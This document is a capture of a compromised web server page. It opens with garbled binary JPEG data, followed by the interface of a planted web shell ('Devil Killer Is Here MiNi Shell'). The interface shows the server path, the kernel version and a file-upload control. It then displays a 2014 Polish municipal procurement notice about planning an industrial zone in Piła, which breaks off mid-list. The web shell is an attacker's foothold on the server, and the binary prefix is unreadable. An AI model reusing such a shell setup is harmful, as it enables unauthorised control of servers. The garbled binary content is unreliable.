JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/41971-N-2014.html

<p class="kh_header"><b>Piła: Przygotowanie dokumentacyjne I i II etapu projektu Rewitalizacja obszarów poprzemysłowych i powojskowych na terenie miasta Piły - rozwój strefy przemysłowej Piła południowo - wschodnia 
- opracowanie koncepcji rozwoju strefy przemysłowej (w tym; inwentaryzacja zieleni); dokumentacji środowiskowej (w tym; opracowanie raportu oddziaływania na środowisko); analizy rzeczowo - finansowej realizacji przedsięwzięcia</b><br>
<b>Numer ogłoszenia: 41971 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie dokumentacyjne I i II etapu projektu Rewitalizacja obszarów poprzemysłowych i powojskowych na terenie miasta Piły - rozwój strefy przemysłowej Piła południowo - wschodnia 
- opracowanie koncepcji rozwoju strefy przemysłowej (w tym; inwentaryzacja zieleni); dokumentacji środowiskowej (w tym; opracowanie raportu oddziaływania na środowisko); analizy rzeczowo - finansowej realizacji przedsięwzięcia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacyjne I i II etapu projektu Rewitalizacja obszarów poprzemysłowych i powojskowych na terenie miasta Piły - rozwój strefy przemysłowej Piła południowo - wschodnia - opracowanie koncepcji rozwoju strefy przemysłowej (w tym inwentaryzacja zieleni); dokumentacji środowiskowej, w tym opracowanie raportu oddziaływania na środowisko; analizy rzeczowo - finansowej realizacji przedsięwzięcia. 
Zamówienie jest elementem projektu w ramach Priorytetu VII Pomoc techniczna, Działanie 7.1 Wsparcie instytucjonalno - kadrowe procesu zarządzania i wdrażania WRPO, Schemat II Inwestycje strategiczne, ujętego w Indykatywnym Wykazie Indywidualnych Projektów Kluczowych dla Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013. 
1. Zakres prac objętych zamówieniem:
   1.1. Opracowanie koncepcji rozwoju strefy przemysłowej Piła południowo - wschodnia etap I i II, w tym
            inwentaryzacja zieleni.
  1.2 Wykonanie dokumentacji środowiskowej, przeprowadzenie procedury w zakresie uzyskania decyzji
            o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, w tym:
1) Przygotowanie karty informacyjnej,
2) Opracowanie raportu oddziaływania przedsięwzięcia na środowisko,
3) Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia.
    1.3  Analiza rzeczowo-finansowa realizacji przedsięwzięcia.
2.  Cel opracowania
     Celem opracowań jest określenie niezbędnego zakresu budowy, przebudowy oraz rozbudowy dróg dla
     podwyższenia ich parametrów technicznych i użytkowych głównie poprzez przebudowę, budowę
     i rozbudowę nawierzchni dla poprawy bezpieczeństwa ruchu, przystosowania ich do ruchu ciężkiego. Projekt
     koncepcji winien obejmować również budowę uzbrojenia podziemnego w zakresie sieci wodno -
     kanalizacyjnych, budowę ciągów pieszo-rowerowych, chodników, oświetlenia ulicznego, kanałów
     technologicznych, budowę obiektu inżynieryjnego przez tory kolejowe. 
     Celem opracowania jest identyfikacja ewentualnych problemów realizacyjnych, analiza wariantów,
     oszacowanie realizacji kosztów inwestycji oraz ocena oddziaływania w aspekcie środowiskowym.
     Zamawiający informuje, że na podstawie przygotowanej koncepcji zlecone zostaną szczegółowe
     opracowania projektów budowlano - wykonawczych dla etapu I i etapu II.
3.  Zamawiający dostarczy i udostępni:
     a) aktualne mapy zasadnicze do celów opiniodawczych,
     b) aktualne mapy ewidencyjne wraz z wypisem z rejestru gruntów,
     c) opracowaną dokumentację projektową pn. Budowa dróg technicznych obsługujących Specjalną Strefę
         Ekonomiczną oraz budowa wjazdu i zjazdu w granicach działek nr 54ukośnik29,60,61ukośnik4 (obręb 28) położonych
         przy ul. Wawelskiej w Pile.
4. Szczegółowy zakres opracowania koncepcji. 
    Całe przedsięwzięcie zostało podzielone na etapy, z których I i II został objęty niniejszym zamówieniem.
    Obszar zasadniczo nie jest objęty miejscowym planem zagospodarowania przestrzennego. 
    4.1. Etap I.
           4.1.1) Przebudowa i rozbudowa ulicy Wawelskiej (m.in. przystosowanie ulicy do ruchu ciężkiego wraz z
                      jej odwodnieniem, oświetleniem, chodnikami i ciągiem pieszo -rowerowym) (ozn. 1 - wg
                     załącznika graficznego);
           4.1.2) Budowa drogi do terenów Podstrefy Piła PSSE (m.in. budowa jezdni, chodników, ciągu pieszo-
                      rowerowego, oświetlenia ulicznego, kanału technologicznego dla przyszłej infrastruktury
                      kablowej)  (ozn. 2 - wg załącznika graficznego);


          4.1.3) Budowa drogi dojazdowej do nieruchomości po stronie wschodniej od obecnego przebiegu drogi
                    krajowej nr 11 (m.in. wykonanie jezdni z chodnikiem, ścieżką rowerową, odwodnieniem,
                    oświetleniem ulicznym) (ozn. 3 - wg załącznika graficznego);
          4.1.4) Przebudowa i rozbudowa ul. Magazynowej (m.in. wykonanie jezdni z chodnikiem, ciągiem pieszo -
                     rowerowym, odwodnieniem, oświetleniem ulicznym) (ozn. 4 - wg załącznika graficznego);
   4.2. Etap II.
          4.2.1. Przebudowa i rozbudowa ul. Walki Młodych (m.in. przystosowanie ulicy do ruchu ciężkiego wraz z
                    jej odwodnieniem, oświetleniem, chodnikami i ciągiem pieszo-rowerowym, zatoki autobusowe,
                    wiaty przystankowe, zieleń przyuliczna) (ozn. 5 - wg załącznika graficznego);
          4.2.2. Wyposażenie w infrastrukturę terenu inwestycyjnego przy ul. Walki Młodych (m.in. Drogi
                    wewnętrzne, sieci wodno - kanalizacyjne, kanał technologiczny) (ozn. 6 - wg załącznika
                    graficznego);
          4.2.3. Obiekt inżynieryjny przeprawy przez tory kolejowe trasy Piła - Poznań (ozn. 7 - wg załącznika
                    graficznego);
          4.2.4. Wyposażenie w infrastrukturę terenu inwestycyjnego położonego pomiędzy torami do Poznania i
                    Bydgoszczy - (m.in. projekt rozbiórek istniejącej infrastruktury i makroniwelacji, drogi
                    wewnętrzne, sieci wodno - kanalizacyjne, kanał technologiczny) (ozn. 8 - wg załącznika
                    graficznego);
          4.2.5. Przebudowa i rozbudowa ul. Na Leszkowie (ozn. 9 - wg załącznika graficznego).
Opis zakresów rzeczowych do zaprojektowania (faza: opracowanie koncepcyjne) przedstawia załącznik nr 1 do niniejszej SIWZ.
Wejście w teren publiczny lub prywatny narusza jego status prawny i dlatego wykonawca zadania winien zasadniczo stosować rozwiązania wykluczające lub ograniczające do niezbędnego minimum zajęcie terenów obcych. 
5. Zawartość opracowania koncepcji.
    5.1) Inwentaryzacja stanu istniejącego, w tym zjazdów do nieruchomości, istniejących ogrodzeń, schodów i
            innych przeszkód, w tym szczegółowa dokumentacja zdjęciowa.
    5.2) Inwentaryzacja zieleni to jest istniejących drzew i krzewów wraz z szczegółową informacją lokalizacji
           (nr działki, ulica), a także oceną rodzaju drzew, krzewów, ich wieku, średnicy, obwodu i sprawdzenie
           innych kwestii dotyczących ochrony przyrody i oddziaływania na środowisko wraz z dokumentacją
           zdjęciową.
    5.3) Inwentaryzacja uzbrojenia podziemnego i naziemnego na podstawie podkładów mapowych
           z uzbrojeniem i wizji terenowej.
    5.4) Opracowanie koncepcji budowy, przebudowy i rozbudowy dróg wraz ze strefowaniem podziemnej
            infrastruktury podziemnej.
    5.5) Opis rozwiązań w zakresie sieci wodociągowej, kanalizacji sanitarnej i deszczowej, wyposażonej
            w podczyszczalnię z wylotem do rz. Gwdy.
    5.6) Lokalizacja kanałów technologicznych wraz z propozycjami ich rozwiązań konstrukcyjnych
            i technologicznych.
    5.7) Szczegółowy opis proponowanego rozwiązania budowy przeprawy obiektem inżynieryjnym przez tory
            trasy kolejowej Piła - Poznań. Zamawiający wymaga przedstawienia rozwiązań wariantowych tego
            elementu. 
    5.8) Zestawienie kosztów realizacji dla poszczególnych wariantów i etapów inwestycji uwzględniające
            poszczególne wydzielone branże oraz w miarę możliwości asortymenty robót grupy kosztów (np.: roboty
            ziemne, nawierzchniowe, odwodnienie, oświetlenie uliczne, organizacja ruchu, kanały technologiczne,
            usunięcie kolizji z sieciami uzbrojenia itp.).
    5.9) Część rysunkowa:
           a) rysunki orientacyjne,
           b) plany sytuacyjne rozwiązań drogowych i zagospodarowania terenu wraz z infrastrukturą (sieć
                uzbrojenia technicznego, odwodnienie, oświetlenie, ciągi pieszo - rowerowe, chodniki, sieci wodno -
                kanalizacyjne itp.),
           c) profile podłużne,
           d) przekroje normalne ze strefowaniem infrastruktury podziemnej,
           e) przekroje konstrukcyjne.
Opracowanie koncepcji należy sporządzić i przekazać Zamawiającemu w 8 egz. w wersji papierowej oraz w 5 egz. w wersji elektronicznej (płyty CDukośnikDVD, pendrive etc.) z podziałem na poszczególne etapy oraz planszę zbiorczą dla całości.
W trakcie opracowywania koncepcji rozwoju strefy przemysłowej Piła południowo - wschodnia dla każdego etapu należy analizować co najmniej 2 warianty rozwiązań, które powinny być przedstawione.
6. Szczegółowy zakres opracowania dokumentacji środowiskowej przez wykonawcę:
    6.1) Przygotowanie karty informacyjnej niezbędnej do złożenia wniosku,
    6.2) Opracowanie raportu oddziaływania przedsięwzięcia na środowisko i przeprowadzenie procedury w
           zakresie uzyskania decyzji środowiskowej
Zgodnie z Rozporządzeniem Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko nasze przedsięwzięcie (biorąc pod uwagę długość dróg o nawierzchni twardej powyżej 1km i sieci kanalizacyjnej nie mniejszej niż 1km) kwalifikuje się do przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko, w związku z tym Zamawiający wymaga przygotowania karty informacyjnej i raportu oddziaływania na środowisko.
Raport o oddziaływaniu przedsięwzięcia na środowisko powinien dla etapu I i II przedsięwzięcia odnosić się do danych dotyczących m.in.: hałasu, wód i ich jakości, obszarów Natura 2000, jakości powietrza, inwentaryzacji przyrodniczej chronionych gatunków, siedlisk oraz korytarzy migracji zwierząt (inwentaryzacja powinna obejmować wszystkie warianty przedsięwzięcia).
Wykonawca złoży Zamawiającemu kompletny wniosek o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia w wersji papierowej (6 egz.) oraz elektronicznej  (5 egz. CDukośnikDVD) w skład, której wchodzi:.
a) Karta informacyjna przedsięwzięcia;
b) Poświadczona przez właściwy organ kopia mapy ewidencyjnej obejmującej przewidywany teren, na którym
    będzie realizowane przedsięwzięcie, oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie 
    (1 egz. w posiadaniu Zamawiającego);
c) Wypis z rejestru gruntów obejmujący przewidywany teren, na którym będzie realizowane przedsięwzięcie,
     oraz obejmujący obszar, na który będzie oddziaływać przedsięwzięcie (1 egz. w posiadaniu Zamawiającego);
d) Raport o oddziaływaniu przedsięwzięcia na środowisko.
7. Zakres obowiązków wykonawcy.
    a) wykonawca winien w celu określenia poprawnych rozwiązań projektowych wykonać w niezbędnym
        zakresie badania gruntowe oraz inwentaryzację geodezyjną;
    b) wykonawca uzyska wszelkich niezbędnych warunków technicznych, informacji i wyjaśnień dotyczących
        istniejących oraz dotychczas zaprojektowanych lub będących w trakcie projektowania sieci podziemnych
        (sieć wodociągowej, kanalizacji sanitarnej i deszczowej, sieci gazowej, sieć energetycznej, sieci
        teletechnicznej) oraz uwzględnienie tych informacji w koncepcji;
    c) wykonawca pozyska niezbędne uzgodnienia (opinie) przedmiotowej Koncepcji z użytkownikami
        i właścicielami infrastruktury technicznej wraz z rozwiązaniem występujących kolizji oraz innych
        niezbędnych uzgodnień w celu przyszłego wykonywania opracowań w stadium projektów budowlanych i
        wykonawczych (Zarządem Dróg i Zieleni, Powiatowym Zarządem Dróg, gestorami mediów (MwiK,
        ENEA itp), Wydziałem Gospodarki Nieruchomościami Urzędu Miasta Piły); 
    d) wykonawca zobowiązany jest do przygotowania i pozyskania dokumentów w celu uzyskania decyzji
        o środowiskowych uwarunkowaniach zgodna z ustawą z dnia 3 października 2008 r. o udostępnieniu
        informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz
        o ocenach oddziaływania na środowisko ( z późn. Zmianami).
    e) wykonawca zobowiązany jest wszystkie pomiary potrzebne do pokazania wpływu oddziaływania
        przedmiotowego przedsięwzięcia na środowisko wykonać zgodnie z Rozporządzeniem Ministra
        Środowiska z dnia 16 czerwca 2011 r. w sprawie wymagań w zakresie prowadzenia pomiarów
        w środowisku substancji lub energii przez zarządzającego drogą, linią kolejową, linią tramwajową,
        lotniskiem, portem (Dz. U. 2011 Nr 140 poz. 824). .
    f) wykonawca winien uwzględnić w swojej ofercie, że w przypadku, kiedy właściwy organ uzna za
        konieczne, w ramach oceny oddziaływania na środowisko, przeprowadzenie rozprawy administracyjnej lub
        innej formy konsultacji ze społeczeństwem, będzie zobowiązany do nawiązania kontaktu z właściwym
        organem w celu przygotowania materiałów i wystąpienia. 
    g) wykonawca zobowiązany jest w przypadku rozprawy administracyjnej do zorganizowania spotkania ze
        społeczeństwem i wygłoszenia prezentacji. Materiały do prezentacji powinny przedstawiać analizę
        wariantów oraz ocenę ich oddziaływania na środowisko. Przygotowane materiały powinny zawierać mapy
        z przebiegiem wariantów, umożliwiające identyfikację działek. 
    h) wykonawca zobowiązany jest uczestniczyć w procesie uzyskania wszystkich wymaganych opinii
         i przedmiotowych decyzji poprzez udzielanie wyjaśnień i dokonywanie odpowiednich zmian
         i uzupełnień w opracowaniach projektowych;
    i) wykonawca w przypadku uchylenia, zmiany, stwierdzenia nieważności pozyskanej decyzji, zobowiązany
        jest do czynnego uczestniczenia w postępowaniu prowadzonym w celu wydania nowej, w tym m.in. Do
        udzielania wszelkich wyjaśnień i przedkładania odpowiednich dokumentacji;
    j) wykonawca zobowiązany jest opracować i przedłożyć szczegółowy harmonogram prac objętych
        zamówieniem do zatwierdzenia Zamawiającemu w terminie 7 dni roboczych od daty podpisania umowy;
    k) wykonawca zobowiązany jest do zorganizowania co najmniej dwóch rad technicznych na etapie
        opracowywania Koncepcji, celem przedstawienia zaawansowania prac projektowych oraz omówienia
        zaproponowanych rozwiązań;
    l) zapłata częściowa za elementy wykonane i odebrane nie zwalnia wykonawcy z obowiązku dokonywania
        zmian w przekazanych elementach wynikających z dokonanych później uzgodnień, bądź pozyskanych
        opinii czy też decyzji. Za pracę zakończoną i odebraną, Zamawiający uznaje dokumentację odebraną wg
        protokołu zdawczo - odbiorczego odbioru końcowego opatrzonego oświadczeniem, że wykonana
        dokumentacja jest zgodna z umową, obowiązującymi przepisami techniczno -budowlanymi, normami,
        wytycznymi i ustaleniami z rad technicznych oraz kompletny z punktu widzenia celu, któremu ma służyć.
    m) dokumentacja powinna być opracowana w formie papierowej oraz w formie elektronicznej przekazanej na
         komputerowym nośniku informacji z rozszerzeniem .pdf , .dwg. i .doc
    n) odbiór dokumentacji projektowej będzie dokonany po przedłożeniu w siedzibie Zamawiającego,
        protokołem przekazania kompletnej dokumentacji w ilości określonej zamówieniem.
    o) wykonawca odpowiedzialny jest za jakość, rzetelność, zgodność z obowiązującymi przepisami, normami,
        wytycznymi i instrukcjami, ponadto ekonomikę zastosowanych rozwiązań technicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania nie jest zobowiązany do wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie: 
- co najmniej dwie usługi na opracowanie koncepcji przebudowy lub budowy dróg wraz z infrastrukturą
  sieciową 
lub
- co najmniej dwie usługi na wykonanie dokumentacji projektowej, których przedmiotem było wykonanie
  projektu budowlano - wykonawczego z zakresu budowy lub przebudowy drogi oraz infrastruktury
  sieciowej o łącznej długości dróg 10 km i sieci 5 km.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca przedstawi wykaz co najmniej 6 osób, wyznaczonych do realizacji niniejszego zamówienia, które będą pełnić funkcje:
a) co najmniej dwie osoby posiadające uprawnienia budowlane bez ograniczeń do projektowania w specjalności
    drogowej, jedna osoba z co najmniej 5-letnim doświadczeniem zawodowym w projektowaniu, a druga osoba z
    co najmniej 3-letnim doświadczeniem zawodowym w projektowaniu po uzyskaniu uprawnień budowlanych. 
b) co najmniej jedną osobę posiadającą uprawnienia budowlane bez ograniczeń do projektowania w
    specjalności konstrukcyjno-budowlanej z co najmniej 3 letnim doświadczeniem zawodowym w
    projektowaniu po uzyskaniu uprawnień budowlanych. 
c) co najmniej jedną osobę posiadającą uprawnienia budowlane bez ograniczeń do projektowania w
    specjalności mostowej z co najmniej 5-letnim doświadczeniem zawodowym  w projektowaniu po uzyskaniu
    uprawnień budowlanych. 
d) co najmniej dwie osoby posiadające uprawnienia budowlane bez ograniczeń do projektowania w
    specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z
    co najmniej 3-letnim doświadczeniem zawodowym w projektowaniu po uzyskaniu uprawnień budowlanych.
e) co najmniej jedną osobę posiadającą uprawnienia budowlane bez ograniczeń do projektowania w
    specjalności telekomunikacyjnej z co najmniej 3-letnim doświadczeniem zawodowym po uzyskaniu
    uprawnień budowlanych. 
f) co najmniej dwie osoby posiadające uprawnienia budowlane bez ograniczeń do projektowania w
    specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,
    wodociągowych i kanalizacyjnych, jedna osoba z co najmniej 3-letnim doświadczeniem zawodowym w
    projektowaniu, a druga osoba z co najmniej rocznym doświadczeniem zawodowym w projektowaniu po
    uzyskaniu uprawnień budowlanych.
g) co najmniej jedną osobę posiadającą świadectwo nadania uprawnień zawodowych w zakresie geodezji i
    kartografii z co najmniej 3-letnim doświadczeniem zawodowym, 
h) specjalista ds. ochrony środowiska - wykształcenie kierunkowe, minimum 3-letnie doświadczenie
    zawodowe przy opracowywaniu kart informacyjnych przedsięwzięć i raportów o oddziaływaniu
    przedsięwzięć na środowisko;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
a) dysponuje  własnymi środkami finansowymi lub zdolnością kredytową  w wysokości nie mniejszej niż 
    50 000 PLN (słownie: pięćdziesiąt tysięcy złotych),  
oraz 
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej
    związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  50 000 PLN (słownie: pięćdziesiąt
    tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

